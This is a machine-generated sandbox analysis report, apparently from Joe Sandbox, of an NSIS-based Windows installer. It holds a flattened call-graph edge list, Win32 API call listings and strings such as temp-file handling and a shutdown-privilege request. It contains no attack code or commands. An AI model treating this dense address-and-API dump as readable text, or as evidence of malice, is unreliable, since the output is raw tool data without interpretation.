calls 4090->4095 4094 403f28 SystemParametersInfoW CreateWindowExW 4091->4094 4124 403f7b 4091->4124 4092 403e74 lstrlenW 4097 403e82 lstrcmpiW 4092->4097 4098 403ea8 4092->4098 4093->4084 4093->4092 4096 405f9e CharNextW 4093->4096 4094->4090 4099 403f77 4095->4099 4101 403e71 4096->4101 4097->4098 4102 403e92 GetFileAttributesW 4097->4102 4100 405f71 3 API calls 4098->4100 4103 40404a 22 API calls 4099->4103 4099->4124 4104 403eae 4100->4104 4101->4092 4105 403e9e 4102->4105 4107 403f88 4103->4107 4160 4066a2 lstrcpynW 4104->4160 4105->4098 4106 405fbd 2 API calls 4105->4106 4106->4098 4109 403f94 ShowWindow 4107->4109 4110 404017 4107->4110 4112 406a26 3 API calls 4109->4112 4152 4057fa OleInitialize 4110->4152 4114 403fac 4112->4114 4113 40401d 4115 404021 4113->4115 4116 404039 4113->4116 4117 403fba GetClassInfoW 4114->4117 4119 406a26 3 API calls 4114->4119 4122 40140b 2 API calls 4115->4122 4115->4124 4118 40140b 2 API calls 4116->4118 4120 403fe4 DialogBoxParamW 4117->4120 4121 403fce GetClassInfoW RegisterClassW 4117->4121 4118->4124 4119->4117 4123 40140b 2 API calls 4120->4123 4121->4120 4122->4124 4123->4124 4124->3989 4125->3961 4126->4006 4127->4010 4129 406a96 5 API calls 4128->4129 4130 403a82 lstrlenW 4129->4130 4131 4066a2 lstrcpynW 4130->4131 4131->4003 4132->4005 4134 405c42 4133->4134 4135 405c46 GetLastError 4133->4135 4134->4024 4135->4134 4137 405c60 4136->4137 4138 405c64 GetLastError 4136->4138 4137->4024 4138->4137 4139->4041 4140->4043 4141->4047 4142->4066 4143->4056 4145 40405e 4144->4145 4161 4065e9 wsprintfW 4145->4161 4147 4040cf 4148 404103 22 API calls 4147->4148 4150 4040d4 4148->4150 4149 403dff 4149->4082 4150->4149 4151 4066df 21 API calls 4150->4151 4151->4150 4153 40466d SendMessageW 4152->4153 4157 40581d 4153->4157 4154 405844 4155 40466d SendMessageW 4154->4155 4156 405856 CoUninitialize 4155->4156 4156->4113 4157->4154 4158 401389 2 API calls 4157->4158 4158->4157 4159->4078 4160->4084 4161->4147 4162 405866 4163 405a10 
4162->4163 4164 405887 GetDlgItem GetDlgItem GetDlgItem 4162->4164 4166 405a41 4163->4166 4167 405a19 GetDlgItem CreateThread CloseHandle 4163->4167 4207 404656 SendMessageW 4164->4207 4169 405a6c 4166->4169 4171 405a91 4166->4171 4172 405a58 ShowWindow ShowWindow 4166->4172 4167->4166 4210 4057fa 5 API calls 4167->4210 4168 4058f7 4176 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 4168->4176 4170 405acc 4169->4170 4173 405a80 4169->4173 4174 405aa6 ShowWindow 4169->4174 4170->4171 4184 405ada SendMessageW 4170->4184 4175 404688 8 API calls 4171->4175 4209 404656 SendMessageW 4172->4209 4178 4045fa SendMessageW 4173->4178 4180 405ac6 4174->4180 4181 405ab8 4174->4181 4179 405a9f 4175->4179 4182 405950 SendMessageW SendMessageW 4176->4182 4183 40596c 4176->4183 4178->4171 4186 4045fa SendMessageW 4180->4186 4185 405727 28 API calls 4181->4185 4182->4183 4187 405971 SendMessageW 4183->4187 4188 40597f 4183->4188 4184->4179 4189 405af3 CreatePopupMenu 4184->4189 4185->4180 4186->4170 4187->4188 4191 404621 22 API calls 4188->4191 4190 4066df 21 API calls 4189->4190 4192 405b03 AppendMenuW 4190->4192 4193 40598f 4191->4193 4194 405b20 GetWindowRect 4192->4194 4195 405b33 TrackPopupMenu 4192->4195 4196 405998 ShowWindow 4193->4196 4197 4059cc GetDlgItem SendMessageW 4193->4197 4194->4195 4195->4179 4198 405b4e 4195->4198 4199 4059bb 4196->4199 4200 4059ae ShowWindow 4196->4200 4197->4179 4201 4059f3 SendMessageW SendMessageW 4197->4201 4202 405b6a SendMessageW 4198->4202 4208 404656 SendMessageW 4199->4208 4200->4199 4201->4179 4202->4202 4203 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4202->4203 4205 405bac SendMessageW 4203->4205 4205->4205 4206 405bd5 GlobalUnlock SetClipboardData CloseClipboard 4205->4206 4206->4179 4207->4168 4208->4197 4209->4169 4217 4015e6 4218 402dcb 21 API calls 4217->4218 4219 4015ed 4218->4219 4220 40601c 4 API calls 4219->4220 4234 4015f6 4220->4234 4221 401656 4223 401688 4221->4223 4224 40165b 4221->4224 
4222 405f9e CharNextW 4222->4234 4226 401423 28 API calls 4223->4226 4225 401423 28 API calls 4224->4225 4227 401662 4225->4227 4232 401680 4226->4232 4236 4066a2 lstrcpynW 4227->4236 4229 405c50 2 API calls 4229->4234 4230 405c6d 5 API calls 4230->4234 4231 40166f SetCurrentDirectoryW 4231->4232 4233 40163c GetFileAttributesW 4233->4234 4234->4221 4234->4222 4234->4229 4234->4230 4234->4233 4235 405bf6 2 API calls 4234->4235 4235->4234 4236->4231 4248 401c68 4249 402da9 21 API calls 4248->4249 4250 401c6f 4249->4250 4251 402da9 21 API calls 4250->4251 4252 401c7c 4251->4252 4253 402dcb 21 API calls 4252->4253 4255 401c91 4252->4255 4253->4255 4254 401ca1 4257 401cf8 4254->4257 4258 401cac 4254->4258 4255->4254 4256 402dcb 21 API calls 4255->4256 4256->4254 4259 402dcb 21 API calls 4257->4259 4260 402da9 21 API calls 4258->4260 4262 401cfd 4259->4262 4261 401cb1 4260->4261 4263 402da9 21 API calls 4261->4263 4264 402dcb 21 API calls 4262->4264 4265 401cbd 4263->4265 4266 401d06 FindWindowExW 4264->4266 4267 401ce8 SendMessageW 4265->4267 4268 401cca SendMessageTimeoutW 4265->4268 4269 401d28 4266->4269 4267->4269 4268->4269 4550 404e68 4551 404e94 4550->4551 4552 404e78 4550->4552 4554 404ec7 4551->4554 4555 404e9a SHGetPathFromIDListW 4551->4555 4561 405ce6 GetDlgItemTextW 4552->4561 4557 404eb1 SendMessageW 4555->4557 4558 404eaa 4555->4558 4556 404e85 SendMessageW 4556->4551 4557->4554 4559 40140b 2 API calls 4558->4559 4559->4557 4561->4556 4562 4028e9 4563 4028ef 4562->4563 4564 4028f7 FindClose 4563->4564 4565 402c4f 4563->4565 4564->4565 4566 4016f1 4567 402dcb 21 API calls 4566->4567 4568 4016f7 GetFullPathNameW 4567->4568 4569 401733 4568->4569 4570 401711 4568->4570 4571 401748 GetShortPathNameW 4569->4571 4572 402c4f 4569->4572 4570->4569 4573 4069ff 2 API calls 4570->4573 4571->4572 4574 401723 4573->4574 4574->4569 4576 4066a2 lstrcpynW 4574->4576 4576->4569 4577 401e73 GetDC 4578 402da9 21 API calls 4577->4578 4579 401e85 GetDeviceCaps MulDiv 
ReleaseDC 4578->4579 4580 402da9 21 API calls 4579->4580 4581 401eb6 4580->4581 4582 4066df 21 API calls 4581->4582 4583 401ef3 CreateFontIndirectW 4582->4583 4584 40265d 4583->4584 4305 402975 4306 402dcb 21 API calls 4305->4306 4307 402981 4306->4307 4308 402997 4307->4308 4309 402dcb 21 API calls 4307->4309 4310 40616d 2 API calls 4308->4310 4309->4308 4311 40299d 4310->4311 4333 406192 GetFileAttributesW CreateFileW 4311->4333 4313 4029aa 4314 402a60 4313->4314 4315 4029c5 GlobalAlloc 4313->4315 4316 402a48 4313->4316 4317 402a67 DeleteFileW 4314->4317 4318 402a7a 4314->4318 4315->4316 4319 4029de 4315->4319 4320 403396 48 API calls 4316->4320 4317->4318 4334 40361d SetFilePointer 4319->4334 4322 402a55 CloseHandle 4320->4322 4322->4314 4323 4029e4 4324 403607 ReadFile 4323->4324 4325 4029ed GlobalAlloc 4324->4325 4326 402a31 4325->4326 4327 4029fd 4325->4327 4328 406244 WriteFile 4326->4328 4329 403396 48 API calls 4327->4329 4330 402a3d GlobalFree 4328->4330 4332 402a0a 4329->4332 4330->4316 4331 402a28 GlobalFree 4331->4326 4332->4331 4333->4313 4334->4323 4585 4014f5 SetForegroundWindow 4586 402c4f 4585->4586 4601 40197b 4602 402dcb 21 API calls 4601->4602 4603 401982 lstrlenW 4602->4603 4604 40265d 4603->4604 4351 4020fd 4352 40210f 4351->4352 4362 4021c1 4351->4362 4353 402dcb 21 API calls 4352->4353 4355 402116 4353->4355 4354 401423 28 API calls 4356 40231b 4354->4356 4357 402dcb 21 API calls 4355->4357 4358 40211f 4357->4358 4359 402135 LoadLibraryExW 4358->4359 4360 402127 GetModuleHandleW 4358->4360 4361 402146 4359->4361 4359->4362 4360->4359 4360->4361 4373 406b05 4361->4373 4362->4354 4365 402190 4369 405727 28 API calls 4365->4369 4366 402157 4367 402176 KiUserCallbackDispatcher 4366->4367 4368 40215f 4366->4368 4371 402167 4367->4371 4370 401423 28 API calls 4368->4370 4369->4371 4370->4371 4371->4356 4372 4021b3 FreeLibrary 4371->4372 4372->4356 4378 4066c4 WideCharToMultiByte 4373->4378 4375 406b22 4376 406b29 GetProcAddress 4375->4376 4377 
402151 4375->4377 4376->4377 4377->4365 4377->4366 4378->4375 4612 402b7e 4613 402bd0 4612->4613 4614 402b85 4612->4614 4615 406a96 5 API calls 4613->4615 4617 402da9 21 API calls 4614->4617 4618 402bce 4614->4618 4616 402bd7 4615->4616 4619 402dcb 21 API calls 4616->4619 4620 402b93 4617->4620 4621 402be0 4619->4621 4622 402da9 21 API calls 4620->4622 4621->4618 4623 402be4 IIDFromString 4621->4623 4625 402b9f 4622->4625 4623->4618 4624 402bf3 4623->4624 4624->4618 4630 4066a2 lstrcpynW 4624->4630 4629 4065e9 wsprintfW 4625->4629 4627 402c10 CoTaskMemFree 4627->4618 4629->4618 4630->4627 4631 401000 4632 401037 BeginPaint GetClientRect 4631->4632 4633 40100c DefWindowProcW 4631->4633 4635 4010f3 4632->4635 4636 401179 4633->4636 4637 401073 CreateBrushIndirect FillRect DeleteObject 4635->4637 4638 4010fc 4635->4638 4637->4635 4639 401102 CreateFontIndirectW 4638->4639 4640 401167 EndPaint 4638->4640 4639->4640 4641 401112 6 API calls 4639->4641 4640->4636 4641->4640 4642 402a80 4643 402da9 21 API calls 4642->4643 4644 402a86 4643->4644 4645 402ac9 4644->4645 4646 402aad 4644->4646 4649 402953 4644->4649 4647 402ae3 4645->4647 4648 402ad3 4645->4648 4651 402ab2 4646->4651 4655 402ac3 4646->4655 4650 4066df 21 API calls 4647->4650 4652 402da9 21 API calls 4648->4652 4650->4655 4656 4066a2 lstrcpynW 4651->4656 4652->4655 4655->4649 4657 4065e9 wsprintfW 4655->4657 4656->4649 4657->4649 3335 401781 3341 402dcb 3335->3341 3339 40178f 3340 4061c1 2 API calls 3339->3340 3340->3339 3342 402dd7 3341->3342 3343 4066df 21 API calls 3342->3343 3344 402df8 3343->3344 3345 401788 3344->3345 3346 406950 5 API calls 3344->3346 3347 4061c1 3345->3347 3346->3345 3348 4061ce GetTickCount GetTempFileNameW 3347->3348 3349 406208 3348->3349 3350 406204 3348->3350 3349->3339 3350->3348 3350->3349 3351 403c82 3352 403c93 CloseHandle 3351->3352 3353 403c9d 3351->3353 3352->3353 3354 403cb1 3353->3354 3355 403ca7 CloseHandle 3353->3355 3360 403cdf 3354->3360 3355->3354 3361 403ced 
3360->3361 3362 403cb6 3361->3362 3363 403cf2 FreeLibrary GlobalFree 3361->3363 3364 405dae 3362->3364 3363->3362 3363->3363 3400 406079 3364->3400 3367 405dd6 DeleteFileW 3369 403cc2 3367->3369 3368 405ded 3371 405f0d 3368->3371 3414 4066a2 lstrcpynW 3368->3414 3371->3369 3443 4069ff FindFirstFileW 3371->3443 3372 405e13 3373 405e26 3372->3373 3374 405e19 lstrcatW 3372->3374 3435 405fbd lstrlenW 3373->3435 3375 405e2c 3374->3375 3378 405e3c lstrcatW 3375->3378 3380 405e47 lstrlenW FindFirstFileW 3375->3380 3378->3380 3380->3371 3398 405e69 3380->3398 3383 405ef0 FindNextFileW 3386 405f06 FindClose 3383->3386 3383->3398 3384 405d66 5 API calls 3387 405f48 3384->3387 3386->3371 3388 405f62 3387->3388 3389 405f4c 3387->3389 3391 405727 28 API calls 3388->3391 3389->3369 3392 405727 28 API calls 3389->3392 3391->3369 3394 405f59 3392->3394 3393 405dae 64 API calls 3393->3398 3396 406462 40 API calls 3394->3396 3396->3369 3397 405727 28 API calls 3397->3398 3398->3383 3398->3393 3398->3397 3415 4066a2 lstrcpynW 3398->3415 3416 405d66 3398->3416 3424 405727 3398->3424 3439 406462 MoveFileExW 3398->3439 3449 4066a2 lstrcpynW 3400->3449 3402 40608a 3450 40601c CharNextW CharNextW 3402->3450 3405 405dce 3405->3367 3405->3368 3406 406950 5 API calls 3412 4060a0 3406->3412 3407 4060d1 lstrlenW 3408 4060dc 3407->3408 3407->3412 3409 405f71 3 API calls 3408->3409 3411 4060e1 GetFileAttributesW 3409->3411 3410 4069ff 2 API calls 3410->3412 3411->3405 3412->3405 3412->3407 3412->3410 3413 405fbd 2 API calls 3412->3413 3413->3407 3414->3372 3415->3398 3456 40616d GetFileAttributesW 3416->3456 3419 405d93 3419->3398 3420 405d81 RemoveDirectoryW 3422 405d8f 3420->3422 3421 405d89 DeleteFileW 3421->3422 3422->3419 3423 405d9f SetFileAttributesW 3422->3423 3423->3419 3425 405742 3424->3425 3434 4057e4 3424->3434 3426 40575e lstrlenW 3425->3426 3429 4066df 21 API calls 3425->3429 3427 405787 3426->3427 3428 40576c lstrlenW 3426->3428 3431 40579a 3427->3431 3432 40578d SetWindowTextW 
3427->3432 3430 40577e lstrcatW 3428->3430 3428->3434 3429->3426 3430->3427 3433 4057a0 SendMessageW SendMessageW SendMessageW 3431->3433 3431->3434 3432->3431 3433->3434 3434->3383 3436 405fcb 3435->3436 3437 405fd1 CharPrevW 3436->3437 3438 405fdd 3436->3438 3437->3436 3437->3438 3438->3375 3440 406483 3439->3440 3441 406476 3439->3441 3440->3398 3459 4062e8 3441->3459 3444 405f32 3443->3444 3445 406a15 FindClose 3443->3445 3444->3369 3446 405f71 lstrlenW CharPrevW 3444->3446 3445->3444 3447 405f3c 3446->3447 3448 405f8d lstrcatW 3446->3448 3447->3384 3448->3447 3449->3402 3451 406039 3450->3451 3452 40604b 3450->3452 3451->3452 3453 406046 CharNextW 3451->3453 3454 405f9e CharNextW 3452->3454 3455 40606f 3452->3455 3453->3455 3454->3452 3455->3405 3455->3406 3457 405d72 3456->3457 3458 40617f SetFileAttributesW 3456->3458 3457->3419 3457->3420 3457->3421 3458->3457 3460 406318 3459->3460 3461 40633e GetShortPathNameW 3459->3461 3486 406192 GetFileAttributesW CreateFileW 3460->3486 3462 406353 3461->3462 3463 40645d 3461->3463 3462->3463 3466 40635b wsprintfA 3462->3466 3463->3440 3465 406322 CloseHandle GetShortPathNameW 3465->3463 3467 406336 3465->3467 3468 4066df 21 API calls 3466->3468 3467->3461 3467->3463 3469 406383 3468->3469 3487 406192 GetFileAttributesW CreateFileW 3469->3487 3471 406390 3471->3463 3472 40639f GetFileSize GlobalAlloc 3471->3472 3473 4063c1 3472->3473 3474 406456 CloseHandle 3472->3474 3488 406215 ReadFile 3473->3488 3474->3463 3479 4063e0 lstrcpyA 3481 406402 3479->3481 3480 4063f4 3482 4060f7 4 API calls 3480->3482 3483 406439 SetFilePointer 3481->3483 3482->3481 3495 406244 WriteFile 3483->3495 3486->3465 3487->3471 3489 406233 3488->3489 3489->3474 3490 4060f7 lstrlenA 3489->3490 3491 406138 lstrlenA 3490->3491 3492 406140 3491->3492 3493 406111 lstrcmpiA 3491->3493 3492->3479 3492->3480 3493->3492 3494 40612f CharNextA 3493->3494 3494->3491 3496 406262 GlobalFree 3495->3496 3496->3474 4658 401d82 4659 402da9 21 API calls 
4658->4659 4660 401d93 SetWindowLongW 4659->4660 4661 402c4f 4660->4661 3516 402903 3517 40290b 3516->3517 3518 40290f FindNextFileW 3517->3518 3520 402921 3517->3520 3519 402968 3518->3519 3518->3520 3522 4066a2 lstrcpynW 3519->3522 3522->3520 3523 401f03 3524 402da9 21 API calls 3523->3524 3525 401f09 3524->3525 3526 402da9 21 API calls 3525->3526 3527 401f15 3526->3527 3528 401f21 ShowWindow 3527->3528 3529 401f2c EnableWindow 3527->3529 3530 402c4f 3528->3530 3529->3530 4662 401503 4663 401508 4662->4663 4664 40152e 4662->4664 4665 402da9 21 API calls 4663->4665 4665->4664 4666 401588 4667 402bc9 4666->4667 4670 4065e9 wsprintfW 4667->4670 4669 402bce 4670->4669 4678 40198d 4679 402da9 21 API calls 4678->4679 4680 401994 4679->4680 4681 402da9 21 API calls 4680->4681 4682 4019a1 4681->4682 4683 402dcb 21 API calls 4682->4683 4684 4019b8 lstrlenW 4683->4684 4685 4019c9 4684->4685 4686 401a0a 4685->4686 4690 4066a2 lstrcpynW 4685->4690 4688 4019fa 4688->4686 4689 4019ff lstrlenW 4688->4689 4689->4686 4690->4688 4691 40508e GetDlgItem GetDlgItem 4692 4050e0 7 API calls 4691->4692 4705 405305 4691->4705 4693 405187 DeleteObject 4692->4693 4694 40517a SendMessageW 4692->4694 4695 405190 4693->4695 4694->4693 4697 4051c7 4695->4697 4699 4066df 21 API calls 4695->4699 4696 4053e7 4698 405493 4696->4698 4708 405440 SendMessageW 4696->4708 4731 4052f8 4696->4731 4700 404621 22 API calls 4697->4700 4703 4054a5 4698->4703 4704 40549d SendMessageW 4698->4704 4706 4051a9 SendMessageW SendMessageW 4699->4706 4701 4051db 4700->4701 4707 404621 22 API calls 4701->4707 4702 405374 4702->4696 4709 4053d9 SendMessageW 4702->4709 4715 4054b7 ImageList_Destroy 4703->4715 4716 4054be 4703->4716 4727 4054ce 4703->4727 4704->4703 4705->4696 4705->4702 4745 404fdc SendMessageW 4705->4745 4706->4695 4722 4051ec 4707->4722 4713 405455 SendMessageW 4708->4713 4708->4731 4709->4696 4710 404688 8 API calls 4714 405694 4710->4714 4712 405648 4720 40565a ShowWindow GetDlgItem ShowWindow 
4712->4720 4712->4731 4719 405468 4713->4719 4715->4716 4717 4054c7 GlobalFree 4716->4717 4716->4727 4717->4727 4718 4052c7 GetWindowLongW SetWindowLongW 4721 4052e0 4718->4721 4728 405479 SendMessageW 4719->4728 4720->4731 4723 4052e5 ShowWindow 4721->4723 4724 4052fd 4721->4724 4722->4718 4726 40523f SendMessageW 4722->4726 4729 4052c2 4722->4729 4732 405291 SendMessageW 4722->4732 4733 40527d SendMessageW 4722->4733 4743 404656 SendMessageW 4723->4743 4744 404656 SendMessageW 4724->4744 4726->4722 4727->4712 4738 405509 4727->4738 4750 40505c 4727->4750 4728->4698 4729->4718 4729->4721 4731->4710 4732->4722 4733->4722 4735 405613 4736 40561e InvalidateRect 4735->4736 4739 40562a 4735->4739 4736->4739 4737 405537 SendMessageW 4742 40554d 4737->4742 4738->4737 4738->4742 4739->4712 4740 404f97 24 API calls 4739->4740 4740->4712 4741 4055c1 SendMessageW SendMessageW 4741->4742 4742->4735 4742->4741 4743->4731 4744->4705 4746 40503b SendMessageW 4745->4746 4747 404fff GetMessagePos ScreenToClient SendMessageW 4745->4747 4749 405033 4746->4749 4748 405038 4747->4748 4747->4749 4748->4746 4749->4702 4759 4066a2 lstrcpynW 4750->4759 4752 40506f 4760 4065e9 wsprintfW 4752->4760 4754 405079 4755 40140b 2 API calls 4754->4755 4756 405082 4755->4756 4761 4066a2 lstrcpynW 4756->4761 4758 405089 4758->4738 4759->4752 4760->4754 4761->4758 4762 40168f 4763 402dcb 21 API calls 4762->4763 4764 401695 4763->4764 4765 4069ff 2 API calls 4764->4765 4766 40169b 4765->4766 4767 402b10 4768 402da9 21 API calls 4767->4768 4769 402b16 4768->4769 4770 4066df 21 API calls 4769->4770 4771 402953 4769->4771 4770->4771 3591 402711 3592 402da9 21 API calls 3591->3592 3601 402720 3592->3601 3593 40285d 3594 40276a ReadFile 3594->3593 3594->3601 3595 402803 3595->3593 3595->3601 3605 406273 SetFilePointer 3595->3605 3596 406215 ReadFile 3596->3601 3597 4027aa MultiByteToWideChar 3597->3601 3598 40285f 3614 4065e9 wsprintfW 3598->3614 3601->3593 3601->3594 3601->3595 3601->3596 3601->3597 
3601->3598 3602 4027d0 SetFilePointer MultiByteToWideChar 3601->3602 3603 402870 3601->3603 3602->3601 3603->3593 3604 402891 SetFilePointer 3603->3604 3604->3593 3606 40628f 3605->3606 3613 4062a7 3605->3613 3607 406215 ReadFile 3606->3607 3608 40629b 3607->3608 3609 4062b0 SetFilePointer 3608->3609 3610 4062d8 SetFilePointer 3608->3610 3608->3613 3609->3610 3611 4062bb 3609->3611 3610->3613 3612 406244 WriteFile 3611->3612 3612->3613 3613->3595 3614->3593 4772 404791 lstrlenW 4773 4047b0 4772->4773 4774 4047b2 WideCharToMultiByte 4772->4774 4773->4774 4775 401491 4776 405727 28 API calls 4775->4776 4777 401498 4776->4777 3615 404b12 3616 404b3e 3615->3616 3617 404b4f 3615->3617 3698 405ce6 GetDlgItemTextW 3616->3698 3619 404b5b GetDlgItem 3617->3619 3625 404bc7 3617->3625 3621 404b6f 3619->3621 3620 404b49 3623 406950 5 API calls 3620->3623 3624 404b83 SetWindowTextW 3621->3624 3629 40601c 4 API calls 3621->3629 3622 404c9e 3678 404e4d 3622->3678 3685 405ce6 GetDlgItemTextW 3622->3685 3623->3617 3681 404621 3624->3681 3625->3622 3630 4066df 21 API calls 3625->3630 3625->3678 3636 404b79 3629->3636 3632 404c2e SHBrowseForFolderW 3630->3632 3631 404cce 3633 406079 18 API calls 3631->3633 3632->3622 3637 404c46 CoTaskMemFree 3632->3637 3638 404cd4 3633->3638 3634 404b9f 3639 404621 22 API calls 3634->3639 3636->3624 3642 405f71 3 API calls 3636->3642 3640 405f71 3 API calls 3637->3640 3686 4066a2 lstrcpynW 3638->3686 3641 404bad 3639->3641 3643 404c53 3640->3643 3684 404656 SendMessageW 3641->3684 3642->3624 3646 404c8a SetDlgItemTextW 3643->3646 3651 4066df 21 API calls 3643->3651 3646->3622 3647 404ceb 3649 406a96 5 API calls 3647->3649 3648 404bb3 3650 406a96 5 API calls 3648->3650 3665 404cf2 3649->3665 3652 404bba 3650->3652 3653 404c72 lstrcmpiW 3651->3653 3655 404bc2 SHAutoComplete 3652->3655 3652->3678 3653->3646 3657 404c83 lstrcatW 3653->3657 3654 404d33 3699 4066a2 lstrcpynW 3654->3699 3655->3625 3657->3646 3658 404d01 GetDiskFreeSpaceExW 3658->3665 3668 

Control-flow Graph (function at 00403665; graph image not reproduced)
APIs
• SetErrorMode.KERNEL32 ref: 00403688
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
• lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
• #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
• OleInitialize.OLE32(00000000), ref: 004037A3
• SHGetFileInfoW.SHELL32(00432708,00000000,?,000002B4,00000000), ref: 004037C2
• GetCommandLineW.KERNEL32(00464260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
• CharNextW.USER32(00000000,004BD000,00000020,004BD000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
• GetTempPathW.KERNEL32(00002000,004D1000,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
• GetWindowsDirectoryW.KERNEL32(004D1000,00001FFB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
• lstrcatW.KERNEL32(004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
• GetTempPathW.KERNEL32(00001FFC,004D1000,004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
• lstrcatW.KERNEL32(004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
• SetEnvironmentVariableW.KERNEL32(TEMP,004D1000,004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
• SetEnvironmentVariableW.KERNEL32(TMP,004D1000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
• DeleteFileW.KERNEL32(004CD000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
• lstrlenW.KERNEL32(004D1000,004BD000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
  • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
• wsprintfW.USER32 ref: 00403AE4
• GetFileAttributesW.KERNEL32(00481000,004D1000), ref: 00403B17
• DeleteFileW.KERNEL32(00481000), ref: 00403B23
• SetCurrentDirectoryW.KERNEL32(004D1000,004D1000), ref: 00403B51
  • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
• CopyFileW.KERNEL32(004D9000,00481000,00000001,004D1000,00000000), ref: 00403B67
  • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
  • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
  • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
  • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
• ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB0
• CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
• ExitProcess.KERNEL32 ref: 00403BD2
• CloseHandle.KERNEL32(00000000,00485000,00485000,?,00481000,00000000), ref: 00403BD9
• GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
• ExitProcess.KERNEL32 ref: 00403C7C
  • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
• String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
• API String ID: 2017177436-2502969717
• Opcode ID: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
• Instruction ID: d5dd5e0f9c74a08960ebc8aa75e9a138e3a42fd8f19371cc0c5244fd25c86c9d
• Opcode Fuzzy Hash: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
• Instruction Fuzzy Hash: 56F108316043019AD720AF769D45B2B7AE8EF4174AF10883EF581B22D1DB7CDA45CB6E

Control-flow Graph (function at 00405866; graph image not reproduced)
APIs
• GetDlgItem.USER32(?,00000403), ref: 004058C4
• GetDlgItem.USER32(?,000003EE), ref: 004058D3
• GetClientRect.USER32(?,?), ref: 00405910
• GetSystemMetrics.USER32(00000002), ref: 00405917
• SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
• SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
